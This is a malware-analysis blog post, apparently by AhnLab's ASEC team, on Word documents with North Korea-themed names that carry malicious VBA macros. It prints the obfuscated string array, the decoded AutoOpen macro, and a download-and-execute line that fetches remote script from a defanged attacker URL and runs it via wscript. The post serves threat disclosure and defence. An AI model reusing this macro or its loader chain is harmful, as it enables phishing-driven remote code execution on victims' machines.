The ASEC analysis team has discovered the continuous distribution of malicious Word files with North Korea-related file names.
The Word files contain malicious VBA macro codes and are the same file type introduced in <Discovery of Continuous Distribution of North Korea-related Malicious Word Files>. The names of the distributed files that were recently discovered are as follows:
- 220426-North Korea’s Diplomatic Policy and Our Responses(Professor Jeong).doc (April 26th)
- North Korea’s Diplomatic Policy and Our Responses.doc (April 26th)
- China’s Diplomatic Policy and Our Responses.doc (April 22nd)
- Press Release-INTERNATIONAL FORUM ON ONE KOREA 2022 -20220422.docm (April 23rd)
- [Analysis] North Korea’s Position on Use of Nuclear Weapons and Implications of Changes in Military Elites Based on April 25th Military Parade (April 26th)
The discovered macro codes include a code that accesses certain URL and runs the downloaded data. The code discovered in the file ‘North Korea’s Diplomatic Policy and Our Responses.doc’ contains the following obfuscated string.
Function Unpck(idx) sa = Array("pi^c$", "wi^n$m~g^mts^:w^in@3^2_$pro~ces`s", "1q^a$z~2^wsx^", "On^ $E~r^ror^ R^es@u^me$ Ne~xt:`Set@ m@x $= ^Cr^ea`teO`b`je~ct^(`""~Mi^cro^so~ft$.X`MLH$TT`P""~):`mx^.op$en@ ""`GE@T`"",` ^""~h^tt`p:/$/g0`0gl`edr^iv^e`.^myw@eb^com`mu~nit$y@.o~rg`/f^il~e~/up^lo`ad^/li`st$.p`h^p?$qu`ery$=^1""~, F$al@se~:mx$.S`end@:$Ex$e@cu`te(`mx.^re$spo`ns~eT`ex^t)", "\v^e$r~s^ion^.i^ni@", "ws^c$r~i^pt.^ex^e @/^/e$:vb~scr`ipt@ /@/b$ ") Key = "@ $ ~ ` ^" s = sa(idx) arrkey = Split(Key) For Each k In arrkey s = Replace(s, k, "") Next Unpck = s End Function
The string is used by the AutoOpen() function that is automatically run when the Word file is opened. The decoded string is shown below.
Sub AutoOpen() On Error Resume Next sn = Denor(0) 'pic Set wm = GetObject(Denor(1)) 'winmgmts:win32_process pw = Denor(2) '1qaz2wsx Weed sn, pw Present Set wnd = ActiveDocument wnd.Save cnt = Denor(3) 'On Error Resume Next:Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open "GET", "hxxp://g00gledrive.mywebcommunity[.]org/file/upload/list.php?query=1", False:mx.Send:Execute(mx.responseText) pth = Templates(1).Path & Denor(4) '\version.ini ResContent pth, cnt wm.Create Denor(5) & pth 'wscript.exe //e:vbscript //b End Sub
The macro also contains a code related to removing document protection that was mentioned in the post <Discovery of Continuous Distribution of North Korea-related Malicious Word Files>. The password is 1qaz2wsx, meaning that the macro is likely created by the same attacker.
The macro then creates the version.ini file in the %AppData%\Microsoft\Templates\ folder. Inside the file is a command that runs data downloaded from a particular URL. One characteristic of the macro is that it includes ‘list.php?query=1’ in the URL it accesses.
On Error Resume Next: Set mx = CreateObject("Microsoft.XMLHTTP"): mx.open "GET", "hxxp://g00gledrive.mywebcommunity[.]org/file/upload/list.php?query=1", False: mx.Send: Execute(mx.responseText)
The created ini file is run by the following command.
- wscript.exe //e:vbscript //b %AppData%\Microsoft\Templates\version.ini
As the URL is no longer valid, the team could not find what the macro does after. Yet as the command used is the same as the one discovered in the post <Word Document Attack Targeting Companies Specialized in Carbon Emissions>, it appears that the macro performed behaviors such as leaking user PC information.
As the attacker suspected of creating the malware is continuously distributing malicious Word files with North Korea-related content, users in the relevant field need to take caution. Users should refrain from opening attachments of emails and running macros of unknown sources.
AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.